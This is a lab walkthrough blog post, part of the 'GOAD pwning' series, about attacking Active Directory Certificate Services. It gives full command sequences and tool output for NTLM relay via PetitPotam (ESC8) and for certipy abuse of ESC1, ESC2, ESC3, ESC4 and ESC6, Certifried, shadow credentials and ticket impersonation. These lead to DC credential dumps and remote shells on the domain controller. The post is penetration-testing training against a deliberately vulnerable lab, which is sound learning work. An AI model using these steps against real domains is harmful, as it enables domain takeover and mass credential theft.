GOAD-ADCS

GOAD – part 6 – ADCS

In the previous post (Goad pwning part5) we tried some attacks with a user account on the domain. On this part we will try attacks when an ADCS is setup in the domain. First we will use petitpotam unauthenticated and ESC8 attack to get domain admin on essos.local, next we will enumerate template certificate with certipy, bloodhound and a user account. To finish we will exploit the following attacks : certipy, esc1, esc2, esc3, esc4, esc6, certifried and shadow credentials.

ESC8 – coerce to domain admin

  • To make this attack work we will need :
    • ADCS running on the domain with web enrollment enabled.
    • A working coerce method (here we use petitpotam unauthent, but an authenticated printerbug or other coerce methods will work the same)
    • There is a useful template to exploit ESC8, by default on an active directory, its name is DomainController

  • The server ask for an authentication so all is fine 🙂
  • Add a listener to relay SMB authentication to HTTP with impacket ntlmrelayx
ntlmrelayx.py -t http://192.168.56.23/certsrv/certfnsh.asp -smb2support --adcs --template DomainController
  • Launch the coerce with petitpotam unauthenticated (this will no more work on an up to date active directory but other coerce methods authenticated will work the same)
petitpotam.py 192.168.56.1 meereen.essos.local 

  • ntlmrelayx will relay the authentication to the web enrollement and get the certificate

see also : https://www.secureideas.com/blog/esc8-the-coerced-crown

ESC8 – with certipy

Oliver Lyak as done a wonderful job on the ADCS attack tool certipy to automatise a lots of things.

Let’s do the same attack with certipy, setup the listener :

certipy relay -ca 192.168.56.23 -template DomainController
  • trig the coerce just like we did before with petitpotam
petitpotam.py 192.168.56.104 meereen.essos.local
  • Now we got the certificate so we can get the NT hash of the DC and also the TGT with the command :
certipy auth -pfx meereen.pfx -dc-ip 192.168.56.12 
  • And we can launch a DCsync with secretsdump and the ticket we get
export KRB5CCNAME=meereen.ccache
impacket-secretsdump -k -no-pass ESSOS.LOCAL/'meereen$'@meereen.essos.local

# or with the hash

secretsdump -hashes ':39d964a01c61c19fe36c71627d7ab56c' -no-pass ESSOS.LOCAL/'meereen$'@meereen.essos.local

.

sudo impacket-ntlmrelayx -t http://192.168.56.23/certsrv/certfnsh.asp -smb2support --adcs --template DomainController

Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Protocol Client SMB loaded..
[*] Protocol Client WINRMS loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client IMAPS loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client RPC loaded..
[*] Protocol Client DCSYNC loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client MSSQL loaded..
[*] Protocol Client SMTP loaded..
[*] Running in relay mode to single host
[*] Setting up SMB Server on port 445
[*] Setting up HTTP Server on port 80
[*] Setting up WCF Server on port 9389
[*] Setting up RAW Server on port 6666
[*] Setting up WinRM (HTTP) Server on port 5985
[*] Setting up WinRMS (HTTPS) Server on port 5986
[*] Multirelay disabled

[*] Servers started, waiting for connections
[*] Setting up RPC Server on port 135
[*] (SMB): Received connection from 192.168.56.12, attacking target http://192.168.56.23
[*] HTTP server returned error code 200, treating as a successful login
[*] (SMB): Authenticating connection from ESSOS/MEEREEN$@192.168.56.12 against http://192.168.56.23 SUCCEED [1]
[*] (SMB): Received connection from 192.168.56.12, attacking target http://192.168.56.23
[*] HTTP server returned error code 200, treating as a successful login
[*] (SMB): Authenticating connection from ESSOS/MEEREEN$@192.168.56.12 against http://192.168.56.23 SUCCEED [2]
[*] http://ESSOS/MEEREEN$@192.168.56.23 [2] -> Generating CSR...
[*] http://ESSOS/MEEREEN$@192.168.56.23 [2] -> CSR generated!
[*] http://ESSOS/MEEREEN$@192.168.56.23 [2] -> Getting certificate...
[*] http://ESSOS/MEEREEN$@192.168.56.23 [1] -> Skipping user MEEREEN$ since attack was already performed
[*] http://ESSOS/MEEREEN$@192.168.56.23 [2] -> GOT CERTIFICATE! ID 17
[*] http://ESSOS/MEEREEN$@192.168.56.23 [2] -> Writing PKCS#12 certificate to ./MEEREEN.pfx
[*] http://ESSOS/MEEREEN$@192.168.56.23 [2] -> Certificate successfully written to file
^C

.

┌──(bolke㉿kali)-[~/PetitPotam]
└─$ python PetitPotam.py 192.168.56.104 meereen.essos.local  

                                                                                             
              ___            _        _      _        ___            _                     
             | _ \   ___    | |_     (_)    | |_     | _ \   ___    | |_    __ _    _ __   
             |  _/  / -_)   |  _|    | |    |  _|    |  _/  / _ \   |  _|  / _` |  | '  \  
            _|_|_   \___|   _\__|   _|_|_   _\__|   _|_|_   \___/   _\__|  \__,_|  |_|_|_| 
          _| """ |_|"""""|_|"""""|_|"""""|_|"""""|_| """ |_|"""""|_|"""""|_|"""""|_|"""""| 
          "`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-' 
                                         
              PoC to elicit machine account authentication via some MS-EFSRPC functions
                                      by topotam (@topotam77)
      
                     Inspired by @tifkin_ & @elad_shamir previous work on MS-RPRN



Trying pipe lsarpc
[-] Connecting to ncacn_np:meereen.essos.local[\PIPE\lsarpc]
[+] Connected!
[+] Binding to c681d488-d850-11d0-8c52-00c04fd90f7e
[+] Successfully bound!
[-] Sending EfsRpcOpenFileRaw!
[+] Got expected ERROR_BAD_NETPATH exception!!
[+] Attack worked!

.

certipy auth -pfx MEEREEN.pfx -dc-ip 192.168.56.12 

Certipy v5.0.4 - by Oliver Lyak (ly4k)

[*] Certificate identities:
[*]     SAN DNS Host Name: 'meereen.essos.local'
[*] Using principal: 'meereen$@essos.local'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'meereen.ccache'
[*] Wrote credential cache to 'meereen.ccache'
[*] Trying to retrieve NT hash for 'meereen$'
[*] Got hash for 'meereen$@essos.local': aad3b435b51404eeaad3b435b51404ee:5acacddaea5394ade78ed058bcddffa0

.

impacket-secretsdump -hashes ':5acacddaea5394ade78ed058bcddffa0' -no-pass ESSOS.LOCAL/'meereen$'@meereen.essos.local

Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:54296a48cd30259cc88095373cec24da:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:cfd3b0f4cf9f1eba2a56dc70d9f185da:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
vagrant:1000:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b:::
daenerys.targaryen:1113:aad3b435b51404eeaad3b435b51404ee:34534854d33b398b66684072224bb47a:::
viserys.targaryen:1114:aad3b435b51404eeaad3b435b51404ee:d96a55df6bef5e0b4d6d956088036097:::
khal.drogo:1115:aad3b435b51404eeaad3b435b51404ee:739120ebc4dd940310bc4bb5c9d37021:::
jorah.mormont:1116:aad3b435b51404eeaad3b435b51404ee:4d737ec9ecf0b9955a161773cfed9611:::
missandei:1117:aad3b435b51404eeaad3b435b51404ee:1b4fd18edf477048c7a7c32fda251cec:::
drogon:1118:aad3b435b51404eeaad3b435b51404ee:195e021e4c0ae619f612fb16c5706bb6:::
sql_svc:1119:aad3b435b51404eeaad3b435b51404ee:84a5092f53390ea48d660be52b93b804:::
pnightmare:1122:aad3b435b51404eeaad3b435b51404ee:58cf12d7448ca3ea7da502c83ee6a31e:::
MEEREEN$:1001:aad3b435b51404eeaad3b435b51404ee:5acacddaea5394ade78ed058bcddffa0:::
BRAAVOS$:1104:aad3b435b51404eeaad3b435b51404ee:c8c0ff50155b8152701e7948de327cde:::
gmsaDragon$:1120:aad3b435b51404eeaad3b435b51404ee:aaafe52526011a3149aba22fb974ae6c:::
SEVENKINGDOMS$:1105:aad3b435b51404eeaad3b435b51404ee:66fe26b4bfb066e1a0db7f917e056c6a:::
<snip>
[*] Cleaning up... 

 

.

ADCS reconnaissance and enumeration (with certipy and bloodhound)

  • Let’s start the enumeration with certipy
certipy find -u khal.drogo@essos.local -p 'horse' -dc-ip 192.168.56.12
  • This will search the certificate server, and dump all the information needed in three format :
    • bloodhound : a zip ready to import in bloodhound (if you use certipy 4.0 you will have to install the bloodhound gui modified by oliver lyak, if you do not want to use the modified version, you must use the -old-bloodhound option)
    • json : information json formated
    • txt : a textual format

  • Certipy 4.0 reintroduce also the -vulnerable option to show the vulnerable templates.
certipy find -u khal.drogo@essos.local -p 'horse' -vulnerable -dc-ip 192.168.56.12 -stdout
  • We can find an ESC1 vulnerable template :
    • Enrollment rights to all domain users
    • Client authentication
    • And Enrollee supplies subject

  • There is also an ESC2 vulnerable template:

And others vulnerable templates, let’s take a look in bloodhound.

cd /opt/tools
wget https://github.com/ly4k/BloodHound/releases/download/v4.2.0-ly4k/BloodHound-linux-x64.zip
unzip BloodHound-linux-x64.zip -d BloodHound4.2-ly4k
rm BloodHound-linux-x64.zip
neo4j start
/opt/tools/BloodHound4.2-ly4k/BloodHound-linux-x64/BloodHound  --no-sandbox --disable-dev-shm-usage
  • Import the zip file created with certipy.
  • And take an overview with : PKI->Find certificate authority, select the certificate authority and click : “see enabled templates”

if you don’t have esc4 setup on the lab, please update and run the following commands:

  • ansible-playbook acl.yml
  • ansible-playbook adcs.yml
  • and next rerun bloodhound and certipy 🙂

Now you should be ok with acl and adcs ESC4 settings 🙂

ADCS – exploitation

ADCS – ESC1

  • enumerate
certipy find -u khal.drogo@essos.local -p 'horse' -dc-ip 192.168.56.12

  • query the certificate
    • target : the ca server
    • tempalte : the vulnerable template
    • upn : the target user we want to impersonate
certipy req -u khal.drogo@essos.local -p 'horse' -target braavos.essos.local -template ESC1 -ca ESSOS-CA -upn administrator@essos.local
  • authentication with the pfx we request before
certipy auth -pfx administrator.pfx -dc-ip 192.168.56.12

if you get the error : “[-] Got error while trying to request TGT: Kerberos SessionError: KDC_ERR_PADATA_TYPE_NOSUPP(KDC has no support for padata type)”, the lab is in error, i don’t know why sometimes it is not working by now, but you can reboot DC3 to fix this: vagrant reload DC03

I was able to get a TGT for Administrator.

Can do anything an Administrator TGT can do.

ewp -u Administrator -H '54296a48cd30259cc88095373cec24da' -i essos.local

.

ADCS – ESC2 & ESC3

 

  • As said in the certipy page : “ESC2 is when a certificate template can be used for any purpose. Since the certificate can be used for any purpose, it can be used for the same technique as with ESC3 for most certificate templates.”
  • Let’s distinguish the 2 attacks by trying with ESC2 :

  • Query cert
certipy req -u khal.drogo@essos.local -p 'horse' -target 192.168.56.23 -template ESC2 -ca ESSOS-CA
  • Query cert with the Certificate Request Agent certificate we get before (-pfx)
certipy req -u khal.drogo@essos.local -p 'horse' -target 192.168.56.23 -template User -ca ESSOS-CA -on-behalf-of 'essos\administrator' -pfx khal.drogo.pfx
  • Auth
certipy auth -pfx administrator.pfx -dc-ip 192.168.56.12

  • We also can do the same with the ESC3-CRA and ESC3 templates in the lab :
certipy req -u khal.drogo@essos.local -p 'horse' -target 192.168.56.23 -template ESC3-CRA -ca ESSOS-CA
certipy req -u khal.drogo@essos.local -p 'horse' -target 192.168.56.23 -template ESC3 -ca ESSOS-CA -on-behalf-of 'essos\administrator' -pfx khal.drogo.pfx
certipy auth -pfx administrator.pfx -username administrator -domain essos.local -dc-ip 192.168.56.12

ADCS – ESC4

  • Take the ESC4 template and change it to be vulnerable to ESC1 technique by using the genericWrite privilege we got. (we didn’t set the target here as we target the ldap)
certipy template -u khal.drogo@essos.local -p 'horse' -template ESC4 -save-old -debug
  • Exploit ESC1 on the modified ESC4 template
certipy req -u khal.drogo@essos.local -p 'horse' -target braavos.essos.local -template ESC4 -ca ESSOS-CA -upn administrator@essos.local
  • authentication with the pfx
certipy auth -pfx administrator.pfx -dc-ip 192.168.56.12
  • Rollback the template configuration
    certipy template -u khal.drogo@essos.local -p 'horse' -template ESC4 -configuration ESC4.json
    

ADCS – ESC6

  • As said on certipy page : “ESC6 is when the CA specifies the EDITF_ATTRIBUTESUBJECTALTNAME2 flag. This flag allows the enrollee to specify an arbitrary SAN on all certificates despite a certificate template’s configuration.”
  • Because ESSOS-CA is vulnerable to ESC6 we can do the ESC1 attack but with the user template instead of the ESC1 template even if the user template got Enrollee Supplies Subject set to false.
certipy req -u khal.drogo@essos.local -p 'horse' -target braavos.essos.local -template User -ca ESSOS-CA -upn administrator@essos.local
certipy auth -pfx administrator.pfx -dc-ip 192.168.56.12

certutil –setreg policy\EditFlags –EDITF_ATTRIBUTESUBJECTALTNAME2
net stop certsvc && net start certsvc

This also mean that if you got an administrator access on the certificate server you can change this attribute to exploit ESC1 without being domain admin 😉

  • But now the exploit ESC6 no longer work, the user is not changed 🙂

Certifried – CVE-2022–26923

certipy account create -u khal.drogo@essos.local -p 'horse' -user 'certifriedpc' -pass 'certifriedpass' -dns 'meereen.essos.local'
  • Request a certificate with the created computer on template Machine
certipy req -u 'certifriedpc$'@essos.local -p 'certifriedpass' -target braavos.essos.local -ca ESSOS-CA -template Machine
  • Authenticate with the certificate as meereen (the dc)
certipy auth -pfx meereen.pfx -username 'meereen$' -domain essos.local -dc-ip 192.168.56.12
  • Dump the ndts with the kerberos ticket we just get
export KRB5CCNAME=/workspace/certifried/meereen.ccache
secretsdump -k -no-pass -just-dc-user daenerys.targaryen ESSOS.LOCAL/'meereen$'@meereen.essos.local
  • delete the created computer with a domain admin user
certipy account delete -u daenerys.targaryen@essos.local -hashes 'aad3b435b51404eeaad3b435b51404ee:34534854d33b398b66684072224bb47a' -user 'certifriedpc'

  • Ok but now imagine you can’t dcsync with secretdump due to a security product on the dc, or you just want to get a shell directly on the DC. Let’s try to get a shell.
  • We got the TGT of the DC (exactly like in part 5 for samaccountname) so we will use impacket getST to impersonate the administrator and get a st to access the DC as administrator (see : https://www.thehacker.recipes/ad/movement/kerberos/delegations/s4u2self-abuse)

remember to use the good impacket pull request to use this, see part5 for installation (thx again to shutdown for the adds to impacket)

export KRB5CCNAME=/workspace/certifried/meereen.ccache
python3 /opt/tools/myimpacket/examples/getST.py -self -impersonate 'administrator' -altservice 'CIFS/meereen.essos.local' -k -no-pass -dc-ip 'meereen.essos.local' 'essos.local'/'meereen'
  • and now we can use our ticket
export KRB5CCNAME=/workspace/certifried/administrator@CIFS_meereen.essos.local@ESSOS.LOCAL.ccache
wmiexec.py -k @meereen.essos.local

  • We could also do the same thing but with winrm to be even more legit 🙂
export KRB5CCNAME=/workspace/certifried/meereen.ccache
python3 /opt/tools/myimpacket/examples/getST.py -self -impersonate 'administrator' -altservice 'HTTP/meereen.essos.local' -k -no-pass -dc-ip 'meereen.essos.local' 'essos.local'/'meereen'

Note : Here we asked an altservice HTTP/meereen.essos.local for winrm usage

export KRB5CCNAME=/workspace/certifried/administrator@HTTP_meereen.essos.local@ESSOS.LOCAL.ccache
evil-winrm -i meereen.essos.local -r ESSOS.LOCAL

  • and voilà 🙂

Shadow Credentials

  • Shadow credentials attack consist of using the GenericAll or GenericWrite privilege on a user or computer to set up the attribute msDS-KeyCredentialLink. explanations here
  • You can get the dacl movement on shutdown (@_nwodtuhs) website, the hacker recipes : https://www.thehacker.recipes/ad/movement/dacl

  • This attack is very usefull when you got Write on another user.
  • With genericWrite you can only do:
    • Target Kerberoasting : add an SPN to a user, do a kerberoasting, unset the spn. But the user password must be weak to the kerberoasting attack work.
    • Set up a logon script : change ldap parameters to set up a logon script. but it implies that the user log to his computer, an smb server or a share to offer the script and setup a script that bypass the security solutions in place)
    • shadow credentials : the attack we want to do, we need a cetificate service on the domain
  • With GenericAll you can :
    • ForceChangePassword : but on a real pentest you don’t want to block a user by changing his password. And this is not very stealthy too. So if you can do another way this is fine 🙂
    • All the attacks available in the genericWrite part.

So if ADCS is enabled on the domain, and we got write privilege on msDS-KeyCredentialLink, we can do the shadow credentials attack to get a direct access on the user account. And this seems to be the better idea in this case on a real pentest.

  • Shadow credentials is now include with certipy (this attack can also be done with pywisker )
certipy shadow auto -u khal.drogo@essos.local -p 'horse' -account 'viserys.targaryen'

  • And we can do the same from viserys to jorah

certipy shadow auto -u viserys.targaryen@essos.local -hashes 'd96a55df6bef5e0b4d6d956088036097' -account 'jorah.mormont'

 

Next time we will have fun with MSSQL (Goad pwning part7) in the lab 🙂